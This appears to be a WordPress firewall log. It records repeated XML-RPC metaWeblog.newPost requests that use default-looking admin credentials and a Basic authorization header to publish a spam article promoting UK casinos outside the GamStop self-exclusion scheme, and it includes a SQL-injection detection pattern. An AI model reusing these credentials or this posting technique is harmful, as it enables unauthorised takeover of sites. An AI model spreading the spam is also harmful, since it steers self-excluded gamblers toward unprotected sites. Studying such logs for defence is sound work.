regulatory and jurisdictional origins. Common options include credit and debit cards, bank transfers, and popular e wallets such as Skrill or Neteller. Some offshore operators also accept crypto currencies, prepaid cards, or alternative payment providers. Each method carries its own processing speed, fees, and security profile. Identity verification or know your customer or KYC checks are standard across reputable operators and are legally required to prevent fraud, money laundering, and underage play. In a KYC focused environment, identity documents and proof of address are required before withdrawals can be processed, and these checks may take place before the first withdrawal or at higher thresholds. Some operators marketed as no KYC offer claim to minimize verification steps for small deposits or early transactions; however, this approach carries significant regulatory risk and potential future withdrawal limitations or account closures. In practice, UK residents should expect some level of verification regardless of licensing, and reputable operators publish a clear verification timeline and a reasonable list of documents. Safety features to look for include SSL\/TLS encryption, two factor authentication options, withdrawal whitelists, and strong customer support. Considering payment methods and KYC requirements is essential for timely withdrawals and secure handling of funds; a well chosen non GamStop site will balance ease of funding with robust identity and risk controls while offering transparent processing times and clear terms about limits and fees. <\/p>\n<h2>Licensing Differences, Responsible Gambling, and Common Player Mistakes<\/h2>\n<p>Licensing differences lie at the heart of why non GamStop UK casinos present both opportunities and risk. Operators licensed by offshore authorities may not be bound by the same level of consumer protection or regulatory enforcement as UK Gambling Commission licensees. This reality makes it essential for players to verify the regulator, ensure there is a credible license number, and confirm if the operator participates in trusted testing regimes and responsible gambling programs. In addition, even within offshore licensing, many operators take responsible gambling seriously, offering timeouts, deposit limits, reality checks, and self assessment tools. The UK audience often expects strong dispute resolution avenues, detailed terms of service, and accessible customer support. Always check for encryption, data protection measures, and clearly stated privacy policies. Self exclusion tools exist beyond GamStop, including local or operator specific controls; players should be aware that non GamStop sites may still implement geographic and risk based restrictions to protect themselves from regulatory exposure. Common player mistakes include skipping terms, chasing losses after a losing streak, not setting personal limits, using insecure devices, and failing to verify withdrawal methods ahead of time. A disciplined approach means using demo play to test games, reading terms thoroughly, limiting time and money, and seeking help if gambling becomes a problem. With careful evaluation of licensing, security practices, and responsible gambling tools, players can enjoy non GamStop experiences while maintaining control and minimizing risk.]]><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>title<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>post_status<\/name>\r\n<value><string>publish<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_slug<\/name>\r\n<value><string>non-gamstop-uk-casinos-safe-choices-and-insights<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>dateCreated<\/name>\r\n<value><dateTime.iso8601>20260514T09:26:50Z<\/dateTime.iso8601><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_password<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>categories<\/name>\r\n<value><array><data>\r\n<value><string>thenethertheplay.co.uk<\/string><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n<member>\r\n<name>custom_fields<\/name>\r\n<value><array><data>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_title<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_description<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self...<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_keywords<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string><\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n\r\n<\/struct><\/value>\r\n<\/param>\r\n<param>\r\n<value><boolean>1<\/boolean><\/value>\r\n<\/param>\r\n<\/params>\r\n<\/methodCall>","POST \/xmlrpc.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36\nhost:47.254.126.238\nauthorization:Basic cm9uaTozWmhJIE9jTUMgQ1VreSA0RFV5IEs4MEcgS0RoeQ==\ncontent-type:text\/xml\ncontent-length:14589\naccept-encoding:identity\n\n<?xml version='1.0'?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param>\r\n<value><string>1<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>admin<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>Admin@123<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><struct>\r\n<member>\r\n<name>mt_keywords<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>mt_convert_breaks<\/name>\r\n<value><string>0<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>description<\/name>\r\n<value><string><![CDATA[<p>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self exclusion framework. These sites operate under offshore or non UK licenses and often advertise generous bonuses, fast withdrawals, and a broader game library. They can be legitimate businesses, regulated by regulators such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions, but they do not participate in the UK self exclusion register. For UK players, choosing a non GamStop casino requires careful due diligence: confirm licensing status, verify security protocols, understand payout speeds, and acknowledge the trade offs in consumer protections. This article delivers a professional, in depth guide to non GamStop UK casinos, exploring how the software works behind the scenes, what RTP and volatility mean in practice, how to manage a bankroll, how promotional bonuses operate, and how payment methods and KYC rules differ. We also discuss licensing and regulation differences, the importance of responsible gambling tools, and common mistakes players make. Whether you are drawn by high roller bonuses, a broader game selection, or flexible withdrawal options, informed choices depend on understanding both the technical and regulatory landscape. Remember that gambling should be approached with discipline and awareness of personal limits. If self exclusion or problem gambling concerns arise, seek professional help and use the safeguards available. This guide focuses on safety, legality, and strategic play for the discerning UK enthusiast exploring non GamStop options.<\/p>\n<h2>What Non GamStop UK Casinos Are and Licensing Landscape<\/h2>\n<p>Non GamStop UK casinos are online gambling platforms that do not participate in the GamStop self exclusion service. In practice this usually means they are licensed by regulators outside the United Kingdom, such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions. For UK players, these operators can offer legitimate gaming experiences, but the level of consumer protection, dispute resolution, and eligibility for certain protections varies by regulator. A crucial first step is to verify the operator is transparent about its licensing body, license number, and the regulator’s remit. Look for independent testing seals from organizations like eCOGRA or iTech Labs, which provide auditing of random number generation and payout fairness. Security should be visible too, with strong encryption like TLS and clear privacy policies. The best non GamStop casinos disclose a robust customer support framework, a clear withdrawal policy, and documented dispute resolution channels. It is important to remember that UK residents may still encounter geolocation checks, identity verification, and country specific restrictions that reflect the operator’s license jurisdiction. While offshore licenses can bring benefits such as broader game libraries and sometimes more generous promotions, they also require extra diligence on terms, withdrawal timelines, and potential regulatory recourse. Responsible gambling remains essential; all operators should offer tools to set limits, and players should be mindful of their own boundaries regardless of jurisdiction.<\/p>\n<h2>Behind the Scenes: RNG, RTP, Volatility, and Game Design<\/h2>\n<p>Every online casino game rests on a mathematical and architectural framework that determines how often a player wins, how big those wins are, and how quickly the game cycles through outcomes. The core engine is a random number generator, a sophisticated software component that produces sequences of numbers that mimic randomness. Reputable non GamStop sites publish the software providers they use, and many games are certified by independent labs such as eCOGRA or iTech Labs to validate fairness. The return to player or RTP expresses the theoretical percentage of wagered money that a game will pay back over a long period. For example, a slot with 96 percent RTP suggests that, in the long run, 96 euros returned for every 100 euros wagered, on average. In practice, results can swing dramatically due to variance, especially in shorter sessions. <\/p>\n<p>Volatility or variance describes how widely outcomes swing from the average. Low volatility games tend to deliver frequent small wins, keeping players in the action with steady but modest returns. High volatility titles pay out less often, but the wins, when they occur, can be significant. This has practical implications for strategy and bankroll: a high variance game can exhaust a small bankroll quickly if the player experiences a string of losses, while a low variance title sustains longer sessions with more consistent but modest gains. Game design also matters: progressive jackpots introduce enormous but rare prizes; paytable structures and bonus rounds can shift expected value in visible ways. When analyzing non GamStop sites, players should consider the game mix, ensure that RNGs are certified, and remember that RTP is a long term statistic that cannot guarantee outcomes in any single session. A healthy understanding of RTP, volatility, and game design supports smarter decisions about which games to play and how long to play them in any given session.<\/p>\n<h2>Bankroll Strategy: Managing Risk and Understanding RTP<\/h2>\n<p>Bankroll management is the foundation of sustainable play on non GamStop platforms. A practical approach starts with defining a bankroll that represents funds you are prepared to lose in pursuit of entertainment. A common guideline is to assign a fixed unit of stake relative to your total bankroll and avoid changing bets dramatically in a single session. The relationship between stake size and RTP matters: higher RTP games reduce expected losses per unit of wager in theory, but volatility can still drive large swings, so the size of your bankroll must align with the variance of the games you choose. A typical strategy is to start with a budget and use flat betting or small, incremental increases in response to winning streaks, while employing a strict stop loss and a target profit rule. For example, if you start with a bankroll of 1000 units, using a 2-unit bet per spin on a medium volatility slot with 96 percent RTP, you approach each spin as a tiny fraction of your total resource. The expected value EV per spin is approximately -0.04 times your stake for a 96 percent RTP game, but the actual outcome will deviate in the short term. That deviation is what makes bankroll discipline critical: it helps you ride favorable sequences without overspending. A well structured plan includes setting daily or session caps, monitoring time spent, and avoiding chasing losses when fatigue or emotional pressure enters the decision loop. By combining a clear budget with an informed understanding of RTP and volatility, players can optimize their chances of leaving with a positive sense of accomplishment rather than a regrettable loss.<\/p>\n<h2>Bonus Mechanics, Promotions, and Wagering Realities<\/h2>\n<p>Bonuses are a key lure of non GamStop UK casinos, offering extra playing power but often accompanied by wagering requirements and other terms that shape real value. Welcome bonuses, no deposit bonuses, free spins, and reload offers each carry their own <a href=\"https:\/\/thenethertheplay.co.uk\/\">casinos not on gamstop<\/a> rules about how winnings can be withdrawn, how bets contribute to wagering, and which games count toward playthrough. A typical wagering requirement expresses the total amount of bets that must be staked before bonus funds or winnings become withdrawable. The actual contribution of different game types to these requirements varies; slots may contribute 100 percent, while table games might contribute far less, and some games could be excluded entirely. It is essential to read the terms and conditions closely before triggering a bonus. In a non GamStop environment, you may encounter generous sign ups, but the wagering hurdles can be proportionally higher, and there may be caps on winnings or time limits that reduce the practical value of the offer. Responsible operators provide transparent wagering metrics and clear instructions on how to meet playthrough requirements. Additionally, promotional terms may restrict withdrawals of bonus funds during the early phase of play, and some promotions may be limited to certain payment methods or geographic regions. A disciplined approach is to compare offers across several operators, measure their true value after wagering, and align your choice with your preferred game mix and playing style. This careful analysis helps players avoid common pitfalls such as over claiming, misunderstanding bonus contributions, or mismanaging time limits.<\/p>\n<h2>Payments, KYC vs No-KYC, and Safety Considerations<\/h2>\n<p>Payment methods at non GamStop UK casinos are diverse, reflecting their regulatory and jurisdictional origins. Common options include credit and debit cards, bank transfers, and popular e wallets such as Skrill or Neteller. Some offshore operators also accept crypto currencies, prepaid cards, or alternative payment providers. Each method carries its own processing speed, fees, and security profile. Identity verification or know your customer or KYC checks are standard across reputable operators and are legally required to prevent fraud, money laundering, and underage play. In a KYC focused environment, identity documents and proof of address are required before withdrawals can be processed, and these checks may take place before the first withdrawal or at higher thresholds. Some operators marketed as no KYC offer claim to minimize verification steps for small deposits or early transactions; however, this approach carries significant regulatory risk and potential future withdrawal limitations or account closures. In practice, UK residents should expect some level of verification regardless of licensing, and reputable operators publish a clear verification timeline and a reasonable list of documents. Safety features to look for include SSL\/TLS encryption, two factor authentication options, withdrawal whitelists, and strong customer support. Considering payment methods and KYC requirements is essential for timely withdrawals and secure handling of funds; a well chosen non GamStop site will balance ease of funding with robust identity and risk controls while offering transparent processing times and clear terms about limits and fees. <\/p>\n<h2>Licensing Differences, Responsible Gambling, and Common Player Mistakes<\/h2>\n<p>Licensing differences lie at the heart of why non GamStop UK casinos present both opportunities and risk. Operators licensed by offshore authorities may not be bound by the same level of consumer protection or regulatory enforcement as UK Gambling Commission licensees. This reality makes it essential for players to verify the regulator, ensure there is a credible license number, and confirm if the operator participates in trusted testing regimes and responsible gambling programs. In addition, even within offshore licensing, many operators take responsible gambling seriously, offering timeouts, deposit limits, reality checks, and self assessment tools. The UK audience often expects strong dispute resolution avenues, detailed terms of service, and accessible customer support. Always check for encryption, data protection measures, and clearly stated privacy policies. Self exclusion tools exist beyond GamStop, including local or operator specific controls; players should be aware that non GamStop sites may still implement geographic and risk based restrictions to protect themselves from regulatory exposure. Common player mistakes include skipping terms, chasing losses after a losing streak, not setting personal limits, using insecure devices, and failing to verify withdrawal methods ahead of time. A disciplined approach means using demo play to test games, reading terms thoroughly, limiting time and money, and seeking help if gambling becomes a problem. With careful evaluation of licensing, security practices, and responsible gambling tools, players can enjoy non GamStop experiences while maintaining control and minimizing risk.]]><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>title<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>post_status<\/name>\r\n<value><string>publish<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_slug<\/name>\r\n<value><string>non-gamstop-uk-casinos-safe-choices-and-insights<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>dateCreated<\/name>\r\n<value><dateTime.iso8601>20260514T09:26:50Z<\/dateTime.iso8601><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_password<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>categories<\/name>\r\n<value><array><data>\r\n<value><string>thenethertheplay.co.uk<\/string><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n<member>\r\n<name>custom_fields<\/name>\r\n<value><array><data>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_title<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_description<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self...<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_keywords<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string><\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n\r\n<\/struct><\/value>\r\n<\/param>\r\n<param>\r\n<value><boolean>1<\/boolean><\/value>\r\n<\/param>\r\n<\/params>\r\n<\/methodCall>"]
["2026-05-16 20:35:54","89.222.112.54","POST","\/xmlrpc.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36","post","select.+(from|limit) >> <?xml version:'1.0'?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param>\r\n<value><string>1<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>admin<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>Admin@123<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><struct>\r\n<member>\r\n<name>mt_keywords<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>mt_convert_breaks<\/name>\r\n<value><string>0<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>description<\/name>\r\n<value><string><![CDATA[<p>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self exclusion framework. These sites operate under offshore or non UK licenses and often advertise generous bonuses, fast withdrawals, and a broader game library. They can be legitimate businesses, regulated by regulators such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions, but they do not participate in the UK self exclusion register. For UK players, choosing a non GamStop casino requires careful due diligence: confirm licensing status, verify security protocols, understand payout speeds, and acknowledge the trade offs in consumer protections. This article delivers a professional, in depth guide to non GamStop UK casinos, exploring how the software works behind the scenes, what RTP and volatility mean in practice, how to manage a bankroll, how promotional bonuses operate, and how payment methods and KYC rules differ. We also discuss licensing and regulation differences, the importance of responsible gambling tools, and common mistakes players make. Whether you are drawn by high roller bonuses, a broader game selection, or flexible withdrawal options, informed choices depend on understanding both the technical and regulatory landscape. Remember that gambling should be approached with discipline and awareness of personal limits. If self exclusion or problem gambling concerns arise, seek professional help and use the safeguards available. This guide focuses on safety, legality, and strategic play for the discerning UK enthusiast exploring non GamStop options.<\/p>\n<h2>What Non GamStop UK Casinos Are and Licensing Landscape<\/h2>\n<p>Non GamStop UK casinos are online gambling platforms that do not participate in the GamStop self exclusion service. In practice this usually means they are licensed by regulators outside the United Kingdom, such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions. For UK players, these operators can offer legitimate gaming experiences, but the level of consumer protection, dispute resolution, and eligibility for certain protections varies by regulator. A crucial first step is to verify the operator is transparent about its licensing body, license number, and the regulator’s remit. Look for independent testing seals from organizations like eCOGRA or iTech Labs, which provide auditing of random number generation and payout fairness. Security should be visible too, with strong encryption like TLS and clear privacy policies. The best non GamStop casinos disclose a robust customer support framework, a clear withdrawal policy, and documented dispute resolution channels. It is important to remember that UK residents may still encounter geolocation checks, identity verification, and country specific restrictions that reflect the operator’s license jurisdiction. While offshore licenses can bring benefits such as broader game libraries and sometimes more generous promotions, they also require extra diligence on terms, withdrawal timelines, and potential regulatory recourse. Responsible gambling remains essential; all operators should offer tools to set limits, and players should be mindful of their own boundaries regardless of jurisdiction.<\/p>\n<h2>Behind the Scenes: RNG, RTP, Volatility, and Game Design<\/h2>\n<p>Every online casino game rests on a mathematical and architectural framework that determines how often a player wins, how big those wins are, and how quickly the game cycles through outcomes. The core engine is a random number generator, a sophisticated software component that produces sequences of numbers that mimic randomness. Reputable non GamStop sites publish the software providers they use, and many games are certified by independent labs such as eCOGRA or iTech Labs to validate fairness. The return to player or RTP expresses the theoretical percentage of wagered money that a game will pay back over a long period. For example, a slot with 96 percent RTP suggests that, in the long run, 96 euros returned for every 100 euros wagered, on average. In practice, results can swing dramatically due to variance, especially in shorter sessions. <\/p>\n<p>Volatility or variance describes how widely outcomes swing from the average. Low volatility games tend to deliver frequent small wins, keeping players in the action with steady but modest returns. High volatility titles pay out less often, but the wins, when they occur, can be significant. This has practical implications for strategy and bankroll: a high variance game can exhaust a small bankroll quickly if the player experiences a string of losses, while a low variance title sustains longer sessions with more consistent but modest gains. Game design also matters: progressive jackpots introduce enormous but rare prizes; paytable structures and bonus rounds can shift expected value in visible ways. When analyzing non GamStop sites, players should consider the game mix, ensure that RNGs are certified, and remember that RTP is a long term statistic that cannot guarantee outcomes in any single session. A healthy understanding of RTP, volatility, and game design supports smarter decisions about which games to play and how long to play them in any given session.<\/p>\n<h2>Bankroll Strategy: Managing Risk and Understanding RTP<\/h2>\n<p>Bankroll management is the foundation of sustainable play on non GamStop platforms. A practical approach starts with defining a bankroll that represents funds you are prepared to lose in pursuit of entertainment. A common guideline is to assign a fixed unit of stake relative to your total bankroll and avoid changing bets dramatically in a single session. The relationship between stake size and RTP matters: higher RTP games reduce expected losses per unit of wager in theory, but volatility can still drive large swings, so the size of your bankroll must align with the variance of the games you choose. A typical strategy is to start with a budget and use flat betting or small, incremental increases in response to winning streaks, while employing a strict stop loss and a target profit rule. For example, if you start with a bankroll of 1000 units, using a 2-unit bet per spin on a medium volatility slot with 96 percent RTP, you approach each spin as a tiny fraction of your total resource. The expected value EV per spin is approximately -0.04 times your stake for a 96 percent RTP game, but the actual outcome will deviate in the short term. That deviation is what makes bankroll discipline critical: it helps you ride favorable sequences without overspending. A well structured plan includes setting daily or session caps, monitoring time spent, and avoiding chasing losses when fatigue or emotional pressure enters the decision loop. By combining a clear budget with an informed understanding of RTP and volatility, players can optimize their chances of leaving with a positive sense of accomplishment rather than a regrettable loss.<\/p>\n<h2>Bonus Mechanics, Promotions, and Wagering Realities<\/h2>\n<p>Bonuses are a key lure of non GamStop UK casinos, offering extra playing power but often accompanied by wagering requirements and other terms that shape real value. Welcome bonuses, no deposit bonuses, free spins, and reload offers each carry their own <a href=\"https:\/\/thenethertheplay.co.uk\/\">casinos not on gamstop<\/a> rules about how winnings can be withdrawn, how bets contribute to wagering, and which games count toward playthrough. A typical wagering requirement expresses the total amount of bets that must be staked before bonus funds or winnings become withdrawable. The actual contribution of different game types to these requirements varies; slots may contribute 100 percent, while table games might contribute far less, and some games could be excluded entirely. It is essential to read the terms and conditions closely before triggering a bonus. In a non GamStop environment, you may encounter generous sign ups, but the wagering hurdles can be proportionally higher, and there may be caps on winnings or time limits that reduce the practical value of the offer. Responsible operators provide transparent wagering metrics and clear instructions on how to meet playthrough requirements. Additionally, promotional terms may restrict withdrawals of bonus funds during the early phase of play, and some promotions may be limited to certain payment methods or geographic regions. A disciplined approach is to compare offers across several operators, measure their true value after wagering, and align your choice with your preferred game mix and playing style. This careful analysis helps players avoid common pitfalls such as over claiming, misunderstanding bonus contributions, or mismanaging time limits.<\/p>\n<h2>Payments, KYC vs No-KYC, and Safety Considerations<\/h2>\n<p>Payment methods at non GamStop UK casinos are diverse, reflecting their regulatory and jurisdictional origins. Common options include credit and debit cards, bank transfers, and popular e wallets such as Skrill or Neteller. Some offshore operators also accept crypto currencies, prepaid cards, or alternative payment providers. Each method carries its own processing speed, fees, and security profile. Identity verification or know your customer or KYC checks are standard across reputable operators and are legally required to prevent fraud, money laundering, and underage play. In a KYC focused environment, identity documents and proof of address are required before withdrawals can be processed, and these checks may take place before the first withdrawal or at higher thresholds. Some operators marketed as no KYC offer claim to minimize verification steps for small deposits or early transactions; however, this approach carries significant regulatory risk and potential future withdrawal limitations or account closures. In practice, UK residents should expect some level of verification regardless of licensing, and reputable operators publish a clear verification timeline and a reasonable list of documents. Safety features to look for include SSL\/TLS encryption, two factor authentication options, withdrawal whitelists, and strong customer support. Considering payment methods and KYC requirements is essential for timely withdrawals and secure handling of funds; a well chosen non GamStop site will balance ease of funding with robust identity and risk controls while offering transparent processing times and clear terms about limits and fees. <\/p>\n<h2>Licensing Differences, Responsible Gambling, and Common Player Mistakes<\/h2>\n<p>Licensing differences lie at the heart of why non GamStop UK casinos present both opportunities and risk. Operators licensed by offshore authorities may not be bound by the same level of consumer protection or regulatory enforcement as UK Gambling Commission licensees. This reality makes it essential for players to verify the regulator, ensure there is a credible license number, and confirm if the operator participates in trusted testing regimes and responsible gambling programs. In addition, even within offshore licensing, many operators take responsible gambling seriously, offering timeouts, deposit limits, reality checks, and self assessment tools. The UK audience often expects strong dispute resolution avenues, detailed terms of service, and accessible customer support. Always check for encryption, data protection measures, and clearly stated privacy policies. Self exclusion tools exist beyond GamStop, including local or operator specific controls; players should be aware that non GamStop sites may still implement geographic and risk based restrictions to protect themselves from regulatory exposure. Common player mistakes include skipping terms, chasing losses after a losing streak, not setting personal limits, using insecure devices, and failing to verify withdrawal methods ahead of time. A disciplined approach means using demo play to test games, reading terms thoroughly, limiting time and money, and seeking help if gambling becomes a problem. With careful evaluation of licensing, security practices, and responsible gambling tools, players can enjoy non GamStop experiences while maintaining control and minimizing risk.]]><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>title<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>post_status<\/name>\r\n<value><string>publish<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_slug<\/name>\r\n<value><string>non-gamstop-uk-casinos-safe-choices-and-insights<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>dateCreated<\/name>\r\n<value><dateTime.iso8601>20260514T09:26:50Z<\/dateTime.iso8601><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_password<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>categories<\/name>\r\n<value><array><data>\r\n<value><string>thenethertheplay.co.uk<\/string><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n<member>\r\n<name>custom_fields<\/name>\r\n<value><array><data>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_title<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_description<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self...<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_keywords<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string><\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n\r\n<\/struct><\/value>\r\n<\/param>\r\n<param>\r\n<value><boolean>1<\/boolean><\/value>\r\n<\/param>\r\n<\/params>\r\n<\/methodCall>","POST \/xmlrpc.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36\nhost:47.254.126.238\nauthorization:Basic cm9uaTozWmhJIE9jTUMgQ1VreSA0RFV5IEs4MEcgS0RoeQ==\ncontent-type:text\/xml\ncontent-length:14589\naccept-encoding:identity\n\n<?xml version='1.0'?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param>\r\n<value><string>1<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>admin<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>Admin@123<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><struct>\r\n<member>\r\n<name>mt_keywords<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>mt_convert_breaks<\/name>\r\n<value><string>0<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>description<\/name>\r\n<value><string><![CDATA[<p>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self exclusion framework. These sites operate under offshore or non UK licenses and often advertise generous bonuses, fast withdrawals, and a broader game library. They can be legitimate businesses, regulated by regulators such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions, but they do not participate in the UK self exclusion register. For UK players, choosing a non GamStop casino requires careful due diligence: confirm licensing status, verify security protocols, understand payout speeds, and acknowledge the trade offs in consumer protections. This article delivers a professional, in depth guide to non GamStop UK casinos, exploring how the software works behind the scenes, what RTP and volatility mean in practice, how to manage a bankroll, how promotional bonuses operate, and how payment methods and KYC rules differ. We also discuss licensing and regulation differences, the importance of responsible gambling tools, and common mistakes players make. Whether you are drawn by high roller bonuses, a broader game selection, or flexible withdrawal options, informed choices depend on understanding both the technical and regulatory landscape. Remember that gambling should be approached with discipline and awareness of personal limits. If self exclusion or problem gambling concerns arise, seek professional help and use the safeguards available. This guide focuses on safety, legality, and strategic play for the discerning UK enthusiast exploring non GamStop options.<\/p>\n<h2>What Non GamStop UK Casinos Are and Licensing Landscape<\/h2>\n<p>Non GamStop UK casinos are online gambling platforms that do not participate in the GamStop self exclusion service. In practice this usually means they are licensed by regulators outside the United Kingdom, such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions. For UK players, these operators can offer legitimate gaming experiences, but the level of consumer protection, dispute resolution, and eligibility for certain protections varies by regulator. A crucial first step is to verify the operator is transparent about its licensing body, license number, and the regulator’s remit. Look for independent testing seals from organizations like eCOGRA or iTech Labs, which provide auditing of random number generation and payout fairness. Security should be visible too, with strong encryption like TLS and clear privacy policies. The best non GamStop casinos disclose a robust customer support framework, a clear withdrawal policy, and documented dispute resolution channels. It is important to remember that UK residents may still encounter geolocation checks, identity verification, and country specific restrictions that reflect the operator’s license jurisdiction. While offshore licenses can bring benefits such as broader game libraries and sometimes more generous promotions, they also require extra diligence on terms, withdrawal timelines, and potential regulatory recourse. Responsible gambling remains essential; all operators should offer tools to set limits, and players should be mindful of their own boundaries regardless of jurisdiction.<\/p>\n<h2>Behind the Scenes: RNG, RTP, Volatility, and Game Design<\/h2>\n<p>Every online casino game rests on a mathematical and architectural framework that determines how often a player wins, how big those wins are, and how quickly the game cycles through outcomes. The core engine is a random number generator, a sophisticated software component that produces sequences of numbers that mimic randomness. Reputable non GamStop sites publish the software providers they use, and many games are certified by independent labs such as eCOGRA or iTech Labs to validate fairness. The return to player or RTP expresses the theoretical percentage of wagered money that a game will pay back over a long period. For example, a slot with 96 percent RTP suggests that, in the long run, 96 euros returned for every 100 euros wagered, on average. In practice, results can swing dramatically due to variance, especially in shorter sessions. <\/p>\n<p>Volatility or variance describes how widely outcomes swing from the average. Low volatility games tend to deliver frequent small wins, keeping players in the action with steady but modest returns. High volatility titles pay out less often, but the wins, when they occur, can be significant. This has practical implications for strategy and bankroll: a high variance game can exhaust a small bankroll quickly if the player experiences a string of losses, while a low variance title sustains longer sessions with more consistent but modest gains. Game design also matters: progressive jackpots introduce enormous but rare prizes; paytable structures and bonus rounds can shift expected value in visible ways. When analyzing non GamStop sites, players should consider the game mix, ensure that RNGs are certified, and remember that RTP is a long term statistic that cannot guarantee outcomes in any single session. A healthy understanding of RTP, volatility, and game design supports smarter decisions about which games to play and how long to play them in any given session.<\/p>\n<h2>Bankroll Strategy: Managing Risk and 